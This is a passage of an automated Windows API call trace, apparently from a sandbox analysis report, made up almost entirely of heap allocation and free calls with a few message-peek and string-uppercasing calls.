dwFlags=0x0, lpMem=0x29f04b0 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ad8 | out: hHeap=0x2af0000) returned 1 [0085.151] lstrlenW (lpString="20") returned 2 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0828 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0768 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f02b8 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f02b8 [0085.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0270 [0085.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01c8 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f02b8 | out: hHeap=0x2af0000) returned 1 [0085.151] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0085.151] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0085.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01c8 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f02b8 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01c8 | out: hHeap=0x2af0000) returned 1 [0085.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01c8 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f02b8 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a745e0 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9e8 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef748 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79128 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a98 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79060 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79088 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaa8 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa48 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a790b0 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a68 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78ea8 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0085.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a88 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef220 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef670 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef5f8 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef520 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729c8 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef310 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef508 | out: hHeap=0x2af0000) returned 1 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef508 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79308 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ac8 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01c8 | out: hHeap=0x2af0000) returned 1 [0085.153] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01c8 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a28 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01c8 | out: hHeap=0x2af0000) returned 1 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a791a0 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01c8 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01e0 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a729c8 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79128 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0270 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a68 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79308 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f02b8 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0270 [0085.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a88 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01c8 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a88 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729c8 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a791a0 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.154] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0085.154] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0085.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0085.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01c8 [0085.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01e0 [0085.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a88 [0085.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0270 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a88 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01c8 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01c8 [0085.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01e0 [0085.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0270 [0085.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a28 [0085.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.154] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef1c0 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79010 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78f98 | out: hHeap=0x2af0000) returned 1 [0085.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eeff8 | out: hHeap=0x2af0000) returned 1 [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef0a0 | out: hHeap=0x2af0000) returned 1 [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eee18 | out: hHeap=0x2af0000) returned 1 [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eef38 | out: hHeap=0x2af0000) returned 1 [0085.155] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0085.155] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0085.155] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0085.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a791a0 [0085.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726c8 [0085.155] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a791a0 | out: hHeap=0x2af0000) returned 1 [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0085.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29eef38 [0085.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0085.155] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0085.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726c8 [0085.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0085.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef0a0 [0085.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eeff8 [0085.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72ad8 [0085.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eee18 [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ad8 | out: hHeap=0x2af0000) returned 1 [0085.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0085.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79330 [0085.155] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79330 | out: hHeap=0x2af0000) returned 1 [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eee18 | out: hHeap=0x2af0000) returned 1 [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eeff8 | out: hHeap=0x2af0000) returned 1 [0085.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef0a0 | out: hHeap=0x2af0000) returned 1 [0085.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0085.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0085.156] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eee18 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726c8 [0085.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eee18 | out: hHeap=0x2af0000) returned 1 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a791a0 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eeff8 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef0a0 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a729c8 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79330 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eee18 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a88 [0085.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eee18 | out: hHeap=0x2af0000) returned 1 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78ea8 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eee18 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef1c0 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0085.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eeff8 | out: hHeap=0x2af0000) returned 1 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78f98 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a28 [0085.156] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78f98 | out: hHeap=0x2af0000) returned 1 [0085.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eeff8 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a28 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef310 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b38 [0085.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0085.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef5f8 [0085.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b38 | out: hHeap=0x2af0000) returned 1 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ef520 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78f98 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a98 [0085.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef670 | out: hHeap=0x2af0000) returned 1 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79010 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e90 [0085.157] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0085.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79060 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b48 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79088 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0085.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaa8 | out: hHeap=0x2af0000) returned 1 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a790b0 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa48 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0085.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79060 | out: hHeap=0x2af0000) returned 1 [0085.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0085.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0085.157] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79060 [0085.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0085.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0085.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0085.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b68 [0085.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0085.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0085.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0085.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe08 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe08 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b68 | out: hHeap=0x2af0000) returned 1 [0085.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.158] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ad8 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b68 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04c8 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04b0 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0528 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 